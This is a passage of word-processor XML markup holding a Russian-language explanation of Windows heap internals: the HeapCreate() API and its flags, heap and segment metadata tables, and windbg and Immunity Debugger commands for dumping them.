      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Наконец, в Immunity Debugger можно сдампить метаданные кучи, используя флаги -h или -q.</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0807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080770"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Первая куча (0x00240000) - стандартная. Остальные создаются компонентами C или конструкторами. Последняя куча в списке (0x00480000) создана нашим приложением.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Приложение может использовать функцию HeapCreate() для создания дополнительно</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>й</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> кучи(куч) и хранить указатели на них по смещению 0x90 в PEB. Ниже объявление HeapCreate() в Windows API:</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t>HANDLE WINAPI HeapCreate(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS" w:hAnsi="Nimbus Mono PS"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS" w:hAnsi="Nimbus Mono PS"/>
        </w:rPr>
        <w:tab/>
        <w:t>__in DWORD flOptions,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS" w:hAnsi="Nimbus Mono PS"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS" w:hAnsi="Nimbus Mono PS"/>
        </w:rPr>
        <w:tab/>
        <w:t>__in SIZE_T dwInitialSize,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS" w:hAnsi="Nimbus Mono PS"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS" w:hAnsi="Nimbus Mono PS"/>
        </w:rPr>
        <w:tab/>
        <w:t>__in SIZE_T dwMaximumSize</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>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pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Вызов HeapCreate() с корректными параметрами возвращает </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>в EAX</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> указатель на созданную кучу.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Описание аргументов:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>flOptions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>+ HEAP_CREATE_ENABLE_EXECUTE: разрешить исполнение кода</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t xml:space="preserve">+ HEAP_GENERATE_EXCEPTIONS: если вызов HeapAlloc() или HeapReAlloc() не может </w:t>
        <w:tab/>
        <w:t>быть корректно отработан, вызывается исключение</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t xml:space="preserve">+ HEAP_NO_SERIALIZE: не использовать сериализованный доступ при работе функций </w:t>
        <w:tab/>
        <w:t>с кучей</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>dwInitialSize</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t xml:space="preserve">+ исходный размер памяти выделяемый для кучи, округлённый до ближайшей границы </w:t>
        <w:tab/>
        <w:t>страницы (4Кб). Если равен 0, выделяется куча размером в одну страницу. Долж</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>ен</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> быть </w:t>
        <w:tab/>
        <w:t>меньше dwMaximumSize</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>dwMaximumSize</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t xml:space="preserve">+ максимальный размер кучи. Если вызов HeapAlloc() или HeapReAlloc() превышает </w:t>
        <w:tab/>
        <w:t xml:space="preserve">dwinitialSize, менеджер виртуальной памяти вернёт нужное количество страниц, </w:t>
        <w:tab/>
        <w:t>остальные будут храниться в</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>о</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> freelist. Если dwMaximumSize равен нулю, куча будет </w:t>
        <w:tab/>
        <w:t xml:space="preserve">расти. </w:t>
        <w:tab/>
        <w:t>Ограничена она будет только величиной доступной памяти.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Больше информации о флагах можно найти на MSDN. Ниже показана таблица, содержащая структуру кучи с подсвеченными важными элементами. Чтобы увидеть её в windbg, используйте команду "dt _heap"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="57" w:after="57"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="__DdeLink__442_790020466"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Адрес</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">Значение </w:t>
        <w:tab/>
        <w:t>Описание</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="57" w:after="57"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">0x00360000 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">0x00360000 </w:t>
        <w:tab/>
        <w:t>Base Address</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="57" w:after="57"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">0x0036000C </w:t>
        <w:tab/>
        <w:t xml:space="preserve">0x00000002 </w:t>
        <w:tab/>
        <w:t>Flags</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="57" w:after="57"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">0x00360010 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">0x00000000 </w:t>
        <w:tab/>
        <w:t>ForceFlags</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="57" w:after="57"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">0x00360014 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">0x0000FE00 </w:t>
        <w:tab/>
        <w:t>VirtualMemoryThreshold</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="57" w:after="57"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">0x00360050 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">0x00360050 </w:t>
        <w:tab/>
        <w:t>VirtualAllocatedBlocks List</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="57" w:after="57"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">0x00360158 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">0x00000000 </w:t>
        <w:tab/>
        <w:t>FreeList Bitmap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="57" w:after="57"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">0x00360178 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">0x00361E90 </w:t>
        <w:tab/>
        <w:t>FreeList[0]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="57" w:after="57"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">0x00360180 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">0x00360180 </w:t>
        <w:tab/>
        <w:t>FreeList[n]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="57" w:after="57"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">0x00360578 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">0x00360608 </w:t>
        <w:tab/>
        <w:t>HeapLockSection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="57" w:after="57"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">0x0036057C </w:t>
        <w:tab/>
        <w:t xml:space="preserve">0x00000000 </w:t>
        <w:tab/>
        <w:t>Commit Routine Pointer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="57" w:after="57"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">0x00360580 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">0x00360688 </w:t>
        <w:tab/>
        <w:t>FrontEndHeap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="57" w:after="57"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">0x00360586 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">0x00000001 </w:t>
        <w:tab/>
        <w:t>FrontEndHeapType</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="57" w:after="57"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">0x00360678 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">0x00361E88 </w:t>
        <w:tab/>
        <w:t>Last Free Chunk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="57" w:after="57"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">0x00360688 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">0x00000000 </w:t>
        <w:tab/>
        <w:t>Lookaside[n]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="57" w:after="57"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Сегменты кучи</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Как уже было сказано, каждый чанк кучи хранится в сегементе. Если чанк освобождается, он добавляется во freelist или lookaside. При аллокации, если менеджер кучи не может найти свободный чанк в lookaside или во freelist, он выделит еще кусок памяти в текущем сегменте кучи. Структура кучи может хранить нескольколько сегментов в случае большого количества аллокаций. Ниже представлена таблица со структурой сегмента.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9972" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="55" w:type="dxa"/>
          <w:left w:w="55" w:type="dxa"/>
          <w:bottom w:w="55" w:type="dxa"/>
          <w:right w:w="55" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1348"/>
        <w:gridCol w:w="1348"/>
        <w:gridCol w:w="1532"/>
        <w:gridCol w:w="1256"/>
        <w:gridCol w:w="1439"/>
        <w:gridCol w:w="1624"/>
        <w:gridCol w:w="1424"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1348" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>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Заголовок</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1348" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>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Размер текущего элемента (0x2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1532" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>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Размер предыдущего элемента (0x2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1256" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>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Индекс сегмента (0x1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1439" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>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Флаг (0x1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1624" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>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Не используется (0x1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1424"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Индекс тега (0x1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1348" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Данные</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8623" w:type="dxa"/>
            <w:gridSpan w:val="6"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>При анализе сегментов кучи в windbg используется команда '!heap -a [heap address]'</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23965" cy="64884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23965" cy="6488430"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>В Immunity Debugger для той же цели используется '!heap -h [heap address] -c' (флаг -c отобразит чанки):</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0130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013075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Структура каждого сегмента </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">представляет собой </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>собственн</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ые </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>метаданны</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>е</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, за которыми следуют чанки данных, выделенные в этом сегменте. Это выделенная память сегмента. Всё остальное место в структуре занимает невыделенная память. Теперь, зная строение сегмента, мы може</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>м</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> сдампить его метаданные командой 'dt _heap_segment [segment address]'.</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7393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739390"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
